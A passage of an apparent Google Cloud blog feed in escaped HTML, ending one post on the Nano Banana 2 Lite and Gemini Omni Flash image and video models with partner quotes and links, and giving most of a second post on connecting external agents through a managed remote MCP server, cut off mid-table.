      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="invideo wrapped" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/invideo_wrapped.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;&lt;i&gt;“The thing that immediately caught my attention was the sheer range of what the Gemini Omni Flash model does. The VFX capabilities surprised me, and looking at it as a producer, that brings in some very interesting possibilities. But the hybrid possibilities are what excite me most. You take the crews you have always worked with in the live-action world, and you bring the breadth of what AI can do now onto the same set.”&lt;/i&gt; - Nishant Tahilramani, Creative Director, Invideo&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=-Gr5DQ4Z8YA"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Gemini Omni Flash in Invideo&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=-Gr5DQ4Z8YA"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="wpp wrapped" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/wpp_wrapped.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;&lt;i&gt;“Through our continued partnership with Google, WPP received early access to the new Gemini Omni Flash’s model and integrated it into WPP Open, our agentic marketing platform. Gemini Omni Flash’s multi-modal capabilities—allowing for seamless image, audio, and video input references—combined with intuitive conversational editing, represent a leap forward for controlled AI production. Teams have tested asset localization, precise product swaps, and dynamic style transfers for clients. We are thrilled to partner with Google Cloud to continually push the boundaries of AI-driven creativity and deliver highly adaptable, intelligent work for our clients.”&lt;/i&gt; – Elav Horwitz, Chief Innovation Officer, WPP&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Nano Banana 2 Lite: Built for cost and speed&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Nano Banana 2 Lite can generate an image in as little as four seconds. You can generate and iterate on design concepts in seconds, taking you from a blank page to the perfect layout instantly. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee" href="https://youtube.com/watch?v=RkgZ_gAeLn8"&gt;

      
        

        &lt;div class="article-video__aspect-image"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Nano Banana 2 Lite speed demo&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg class="h-c-video__play h-c-icon h-c-icon--color-white" xmlns="http://www.w3.org/2000/svg"&gt;
        &lt;use xlink:href="#mi-youtube-icon" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
      &lt;figcaption class="article-video__caption h-c-page"&gt;
        
          &lt;h4 class="h-c-headline h-c-headline--four h-u-font-weight-medium h-u-mt-std"&gt;Nano Banana 2 Lite generates images in as little as four seconds.&lt;/h4&gt;
        
        
      &lt;/figcaption&gt;
    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"&gt;
   &lt;a class="glue-yt-video" href="https://youtube.com/watch?v=RkgZ_gAeLn8"&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Significant improvements over Nano Banana (Gemini 2.5 Flash Image) &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Nano Banana 2 Lite blends fast image generation with a significant leap in visual quality and capability compared to our legacy model, Nano Banana. We enhanced core capabilities so you can execute complex tasks at high speeds: &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;World knowledge&lt;/strong&gt;: Quickly draft accurate contextual scenes, rough data visualizations, and location-specific mockups.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Character consistency&lt;/strong&gt;: Maintain character identities and object fidelity across multiple swift generations to easily build out storyboarding tools or embed virtual try-ons for ecommerce.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Quick text and localization&lt;/strong&gt;: Draft copy on the fly by rendering legible text directly into rapid generations to see how typography works across localized ad variations.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To see the full list of model capabilities and how to integrate it check out the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/models/gemini/3-1-flash-lite-image"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise-agent-platform/generative-ai/pricing"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;pricing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Note: &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Image generation offers the fastest latency. Image editing may experience slightly higher  response time.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="image generation" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/nb2-lite__benchmark_blog.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Fast, cost-efficient image generation with a significant leap in visual quality and capability compared to our legacy model, Nano Banana&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;I&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;ndustry leaders building faster visual experiences with Nano Banana 2 Lite&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;/h3&gt;&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="artlist wrapped" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/artlist_wrapped.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;&lt;i&gt;“Speed is no longer a limitation. When generation is faster than imagination, creators can stay inside the idea instead of waiting on the tool. Nano Banana 2 Lite brings that feeling into the creative process, letting thoughts move into visuals almost instantly. For Artlist’s users, it means less time staring at a progress bar and more time creating, iterating, personalizing, and moving at the speed of culture.” -&lt;/i&gt; Idan Yonas, Director of AI Content &amp;amp; Innovation, Artlist&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="figma wrapped" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/figma_wrapped.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;&lt;i&gt;"Nano Banana 2 Lite is fast and reliable, helping designers explore more ideas to craft unique images on Figma Weave's node-based canvas. It's ideal for rapid iteration while staying in the creative flow."&lt;/i&gt; - Itay Schiff, Co-founder and Creative Director, Figma&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_with_image"&gt;&lt;div class="article-module h-c-page"&gt;
  &lt;div class="h-c-grid uni-paragraph-wrap"&gt;
    &lt;div class="uni-paragraph
      h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
      h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3"&gt;

      






  

    &lt;figure class="article-image--wrap-small
      
      "&gt;

      
      
        
        &lt;img alt="manus wrapped" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/manus_wrapped.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  





      &lt;p&gt;&lt;i&gt;"We have been testing Nano Banana 2 Lite to power real-time image generation within Manus’s autonomous workflows—from slide decks to web pages. Its speed suits these scenarios well, allowing our AI Agent to iterate on visuals quickly and deliver results in seconds. The image quality is also impressive, coming close to the full Nano Banana 2. We look forward to continuing our partnership and building better experiences together."&lt;/i&gt; - Tao Zhang, Co-founder and Chief Product Officer, Manus AI.&lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Safety and enterprise governance&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;C2PA content credentials and imperceptible SynthID watermarks are enabled by default to help verify content authenticity for both models.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To handle high-concurrency API requests reliably at scale, the Gemini Enterprise Agent Platform offers provisioned throughput (PT) for Nano Banana 2 Lite starting today. Provisioned throughput for Gemini Omni Flash will be rolling out soon.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Start building today&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Embed these image and video generation and editing capabilities into your applications and creative workflows today. Explore these resources to start building:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Try the models: &lt;/span&gt;&lt;a href="https://console.cloud.google.com/agent-platform/studio/multimodal?model=gemini_omni_flash_preview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; within Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;API documentation: &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/models/gemini/3-1-flash-lite-image"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Nano Banana 2 Lite&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/models/gemini/omni-flash-preview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Omni Flash&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Access Colab notebooks: &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/generative-ai/blob/main/gemini/getting-started/intro_gemini_3_1_flash_lite_image_gen.ipynb" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Nano Banana 2 Lite&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/generative-ai/blob/main/vision/getting-started/gemini_omni_flash_video_gen.ipynb" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Omni Flash&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Pricing: &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise-agent-platform/generative-ai/pricing"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Platform Pricing &lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;for both models&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Prompting guides: &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/ultimate-prompting-guide-for-nano-banana"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Nano Banana&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://deepmind.google/models/gemini-omni/prompt-guide/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Omni Flash&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Gemini Omni Flash &lt;/span&gt;&lt;a href="https://github.com/google-gemini/gemini-skills/tree/main/skills" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Prompting Agent Skills&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/ai-machine-learning/nano-banana-2-lite-and-gemini-omni-flash-available" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-30T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/ai-machine-learning/gemini-enterprise-agent-platform-remote-mcp-server</id>
    <title>Build agents even faster with Gemini Enterprise Agent Platform’s fully-managed, remote MCP server</title>
    <updated>2026-06-30T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A couple of months ago, we announced that &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/google-managed-mcp-servers-are-available-for-everyone?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;over 50 Google-managed MCP servers&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; are available. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Today, we’ll dive into how to use the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/reference/use-agent-platform-mcp"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform remote MCP server&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to securely connect your external AI agents to the resources inside your Google Cloud environment.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Connect your IDE to Google Cloud&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Think of the Agent Platform MCP server as a bridge between your favorite external development tools and your Google Cloud architecture.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;If you are building an agent in Antigravity CLI or Claude Code, for example, the Agent Platform MCP server allows that agent to securely interact with your Agent Platform resources. That way, your agent can now easily call &lt;/span&gt;&lt;a href="https://console.cloud.google.com/agent-platform/model-garden"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;models from Model Garden&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, pull down shared &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/models/prompts/prompt-templates"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;prompt templates&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, or even manage &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/notebooks/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Notebooks&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; directly within your project – all without ever leaving the IDE.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Quicker time-to-value&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The speed at which you deliver value is one of your greatest advantages. But sometimes, connecting external development environments to cloud infrastructure forces a trade-off. Developers want to move fast with minimal setup, while IT teams need strict governance over data access. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Agent Platform MCP server provides a single, standardized interface for your external agents so you can spend less time writing integration code and more time building useful features. And by running entirely within Google Cloud’s secure infrastructure, it gives you ready-to-use endpoints that protect your data while accelerating your development.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Get the best of both worlds:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Build with open standards: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Agents you build outside of Google Cloud stay fully compliant with the open &lt;/span&gt;&lt;a href="https://modelcontextprotocol.io" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;MCP specification&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Your external IDEs and frameworks can seamlessly interact with your cloud environment without locking you into a proprietary ecosystem.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Centralized discovery: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Catalog your assets with &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/agent-registry"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agent Registry&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in Agent Platform. It acts as your organization's centralized library, so your teams can securely store, search for, and govern their entire inventory of skills, tools, and other AI capabilities.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Easy access with security and governance: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Your connections are protected by default. IT teams can leverage native &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/mcp/control-mcp-use-iam#deny-all-mcp-tool-use"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud IAM Deny policies&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to ensure external developer frameworks only interact with authorized Google Cloud resources.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;How it works: Three simple steps to connectivity&lt;/strong&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Enable the API&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The Gemini Enterprise Agent Platform remote MCP server is automatically enabled when you enable the Gemini Enterprise Agent Platform API within your Google Cloud project.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1_AP_Home" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_AP_Home.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;2. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Configure your client&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Connect your AI application by following our &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/reference/use-agent-platform-mcp#configure-client"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;configuration instructions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to point to the remote server.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2_Configuration" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_Vo4cvfF.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;3. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Use toolsets&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Access a robust, copyable list of &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini-enterprise-agent-platform/reference/mcp#expandable-1"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Toolset Endpoints&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to begin interacting with your Agent Platform resources immediately.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3_Toolset_Endpoints" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_INFnkQs.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Available toolsets:&lt;/strong&gt;&lt;/h3&gt;
&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td colspan="3" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;MCP Toolsets&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Endpoint&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Description&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Tools&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;/mcp/generate&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Generative AI tools&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Core generation features&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;/mcp/predict&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Prediction tools&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Inference and raw prediction&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;/mcp/notebook&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Colab enterprise notebook tools&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Notebook runtime and execution management&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;/mcp/endpoints&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Endpoint management tools&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"&gt;
